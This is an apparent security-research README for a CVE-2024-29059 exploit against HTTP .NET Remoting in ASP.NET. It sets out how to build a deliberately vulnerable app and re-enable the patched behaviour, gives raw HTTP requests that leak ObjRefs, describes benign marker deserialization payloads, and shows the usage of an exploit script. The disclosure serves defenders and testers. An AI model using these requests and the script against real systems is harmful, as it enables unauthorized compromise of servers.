Share
## https://sploitus.com/exploit?id=ECD4FD23-B458-59C4-BEBE-FE03B08F00A0
# Leaking and Exploiting `ObjRef`s via HTTP .NET Remoting (CVE-2024-29059)

This repository provides further details and resources on the [CODE WHITE blog post of the same name *Leaking ObjRefs to Exploit HTTP .NET Remoting*](https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/):

1. Creating a vulnerable ASP.NET web application
2. Detecting `ObjRef` leaks
3. Example deserialization payloads that work under the `TypeFilterLevel.Low` restrictions
4. Exploit script for delivering the payloads


## 1. Creating a Vulnerable ASP.NET Web Application

The following is based on [*Configure Application Insights for your ASP.NET website* by Microsoft](https://learn.microsoft.com/en-us/azure/azure-monitor/app/asp-net) and describes how to create a vulnerable ASP.NET web application with Visual Studio 2019 (required to target .NET Framework 4.5.2, you can still download it at <https://aka.ms/vs/16/release/vs_community.exe>) and Microsoft Application Insights:

1. Open Visual Studio 2019.
2. Select **File** > **New** > **Project**.
3. Select **ASP.NET Web Application (.NET Framework) C#**, then **Next**.
4. Select **.NET Framework 4.5.2**, then **Create**.
5. Select **Empty**, then **Create**.
6. Select **Project** > **Add Application Insights Telemetry**.
7. Select **Application Insights SDK (local)**, then **Next**.
8. Check **NuGet packages**, then click **Finish**.

If the .NET Framework updates of January 2024 are installed, open the `Web.config` file and add the following under [`/configuration/appSettings`](https://learn.microsoft.com/en-us/dotnet/framework/configure-apps/file-schema/appsettings/appsettings-element-for-configuration) to re-enable the vulnerable behavior:

```xml
<add key="microsoft:Remoting:LateHttpHeaderParsing" value="true" />
```

You can then run the web application via **Debug** > **Start Without Debugging** or by pressing Ctrl+F5.


## 2. Detecting `ObjRef` Leaks

You can use the following requests to leak `ObjRef`s of `MarshalByRefObject` instances stored in the `LogicalCallContext`:

- `BinaryServerFormatterSink`:

    ```
    GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
    __RequestVerb: POST
    Content-Type: application/octet-stream
    ```

- `SoapServerFormatterSink`:

    ```
    GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.0
    __RequestVerb: POST
    Content-Type: text/xml
    ```

Leaked `ObjRef` URIs can then be matched using the following regex:

```
/[0-9a-f_]+/[0-9A-Za-z_+]+_\d+\.rem
```


## 3. Example Deserialization Payloads

We have created two simple deserialization payloads based on the [*TextFormattingRunProperties* gadget of YSoSerial.Net](https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Generators/TextFormattingRunPropertiesGenerator.cs) with custom XAML payloads that work under the restrictions caused by `TypeFilterLevel.Low` to perform the following:

- `HttpContext.Current.Response.AddHeader("Set-Cookie", "x=ad92afb4-00c3-4479-bab8-2425b5716081")`
- `HttpContext.Current.Response.RedirectLocation = "/ad92afb4-00c3-4479-bab8-2425b5716081"`

The HTTP headers can be observed in the server's response to the HTTP .NET Remoting request.


## 4. Exploit Script

The `RemoteApplicationMetadata.py` script provides a way for leaking existing `ObjRef` and then using it in a subsequent request to deliver a given payload:

```
usage: RemoteApplicationMetadata.py [-h] [-c] [--chunk-range CHUNK_RANGE] [-e] [-f {binary,soap}] [-u] [-v] url [file]

positional arguments:
  url                   target URL (without `RemoteApplicationMetadata.rem`)
  file                  BinaryFormatter/SoapFormatter payload file (default: stdin)

options:
  -h, --help            show this help message and exit
  -c, --chunked         use chunked Transfer-Encoding for request
  --chunk-range CHUNK_RANGE
                        range to pick the chunk size from randomly, e. g., 1-10
  -e, --encoding        apply a random non ASCII-based encoding on SOAP
  -f {binary,soap}, --format {binary,soap}
                        targeted runtime serializer format (default: soap)
  -u, --use-generic-uri
                        use the generic `RemoteApplicationMetadata.rem` also for the payload delivery request
  -v, --verbose         print verbose info
```

Example:

```
./RemoteApplicationMetadata.py -f binary https://127.0.0.1:44365 AddHeader.bin -u -v
```